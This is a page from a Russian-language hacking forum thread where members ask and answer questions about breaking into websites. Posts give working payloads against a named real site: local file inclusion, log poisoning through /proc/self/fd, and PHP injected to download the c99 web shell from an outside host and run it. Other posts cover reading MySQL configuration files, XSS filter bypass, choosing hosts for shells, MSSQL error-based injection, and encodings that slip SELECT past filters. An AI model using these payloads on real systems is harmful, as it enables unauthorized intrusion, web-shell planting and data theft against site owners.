Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Virologist

    Virologist New Member

    Joined:
    7 May 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    2
    Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?
     
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    Если есть (LFI) инклуд попробуй просто залить шелл и через него посмотреть скрипты/конфиги вариантов много ...
    а так прочитай конфиги
    /var/lib/mysql/my.cnf
    /etc/mysql/my.cnf
    /etc/my.cnf
    или дефолтные пути ПМА
    Code:
    /phpm/ 
    /phpmy/ 
    /phpmyadmin/ 
    /PMA/ 
    /mysql/ 
    /admin/ 
    /db/ 
    /dbadmin/ 
    /web/phpMyAdmin/ 
    /admin/pma/ 
    /admin/phpmyadmin/ 
    /admin/mysql/ 
    /phpmyadmin2/ 
    /mysqladmin/ 
    /mysql-admin/ 
    /phpMyAdmin-2.5.6/ 
    для начало просто инклуди индекс и смотри что куда инклудится в скриптах и про /proc/self/environ не забудь прочитать
     
    _________________________
  3. Virologist

    Virologist New Member

    Joined:
    7 May 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    2
    Изначально пытался залить шелл через /proc/self/environ и User Agent, пробовал по разному через system и copy облом, только одним способом получилось просмотреть корневую директорию <?eval(file_get_contents('http://********.ru/1.txt'));?>, а при попытке перехода или открытия файла кидает на 404 страницу, вообще я понимаю из за чего это происходит. Должно быть так index.php?e=eval(file_get_contents('http://********.ru/1.txt')); но как это сделать если я вставляю код через User Agent. Вообще у меня мало опыта может я что то упустил
     
    #13063 Virologist, 20 May 2010
    Last edited: 20 May 2010
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    всем привет!
    случай такой,есть инклуд файлов,
    http://www.aiesec-berlin.de/KDK/index.php?load=file
    вот вроде как найшел error_logs причем они одинаковые..
    http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
    http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6

    удалось впихнуть в них свой код:
    http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00<? include('http://shell.narod.ru/testing.php');?>

    в ответ в логах вижу это:
    http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)
     
    1 person likes this.
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

    интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

    подскажите с чем это может быть связано,что profile.php не работает..
     
    _________________________
    #13065 Konqi, 20 May 2010
    Last edited: 20 May 2010
  6. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    я такое там нашел:
    PHP Warning: include(): URL file-access is disabled in the server configuration

    allow_url_fopen On On
    allow_url_include Off Off

    залил шел так:
    1.

    http://www.aiesec-berlin.de/KDK/index.php?load=StSigX15981<?php copy($_GET[aa],$_GET[bb]);include($_GET[bb]); ?>EndSigX15981
    2.
    http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00&aa=http://madnet.name/files/download/9_c99madshell.php&bb=/tmp/qwe.php

    кривовато правда получилось (к шелу еще вся эта хрень грузится), но работает :)
    думаю с этим можно дальше уже справиться
     
    #13066 DrakonHaSh, 20 May 2010
    Last edited: 20 May 2010
    2 people like this.
  7. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    чето уже негрузится:)
    видать пропалили...
    http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2

    а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?

    и что это ты понаписал StSigX15981???????

    и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
    хотя я уже догнал:)
    ты присвоил глобальной переменной aa сайт маднета:)
    и проинклудил его... прикольно, но очень паливно:)
     
    #13067 547, 20 May 2010
    Last edited: 20 May 2010
  8. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    StSigX15981 - это для визуализации в логах того, что запрос нормально записался

    да, шел грузился вместе с логами

    паливно да, но это я на скорую руку сделал, по умному надо было бы так:
    http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>

    ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел
     
  9. Demon1X

    Demon1X New Member

    Joined:
    31 May 2007
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh

    2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
    вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.
     
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Если не ошибаюсь то код с которым ты восстановил БД через какое то время удаляется!!!
    Лично у меня такое было пару раз!!
     
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    1. Никак. хоть какие права там будут!

    2. Шел без разницы каким макаром заливать!!
    Лучше всего когда юзер и группа ROOT, тогда можешь все файлв изменять. Хотя и тут куча разных факторов!
     
    #13071 GOGA075, 21 May 2010
    Last edited: 21 May 2010
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    DrakonSerg Пробуй
    www.........com/admin
    www.........com/admin.php
    www.........com/admininstrator
    и так далее. все писать не буду!
    А папка читается видно из-за неграмотности или пофигизма администрации сайта!
     
  13. WebeX

    WebeX New Member

    Joined:
    31 Mar 2007
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -6
    Привет всем, давненько у Вас не появлялся, вот вновь пришел!
    Ребята есть вопрос, сегодня на одном из сайтов искал XSS при вводе <script>alert()</script> фильтр полностью обрезает что находится внутри <script></script>
    Пробовал по другому <script 1></script 1> толку ноль!
    BB кодами тож пробовал, разрешен код [IM*G][/IM*G] - (* нарочно поставил, что бы форум не реагировал!) если ставишь картинку то показывает ее нормально, если после картинки пробел то показывает только ссылку и тишина.
    Подскажите что сделать можно!
     
  14. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    WebeX
    http://ha.ckers.org/xss.html
     
  15. nedon

    nedon New Member

    Joined:
    14 May 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    я в slq новичек так что не пинайте сильно
    для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
     
    #13075 nedon, 21 May 2010
    Last edited: 21 May 2010
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    за красоту :D
     
    _________________________
    1 person likes this.
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Database.. бывают сразу много баз, и есле выводиш таблицы то пишешь с какой базы, так и в других целях бывает нужда... про user много тебе описывать не буду но посоветую почитать в мануале mysql и т.д...
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    UP
     
    _________________________
  19. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    привет, тут у меня вопрос по mssql inj

    Code:
    http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
    Code:
    Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64) 
    	Feb 10 2007 00:59:02 
    	Copyright (c) 1988-2005 Microsoft Corporation
    	Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
    попробовал or 1=(select db_name())-- редирект дал.

    потом без селекта
    Code:
    http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
    DB Name: SSDB


    запрос:
    Code:
    http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
    дает редир :mad:

    А ЗАПРОС:
    Code:
    http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    тоже редирект дает

    тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
    заранее спс
     
  20. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    попробуй вместо SELECT

    1) %53%45%4C%45%43%54
    2) SELeCt
    3) SEL/*blabla*/ECt
    4) 'SEL'+'ECT
    5) /*!SELECT*/
     
Loading...
Thread Status:
Not open for further replies.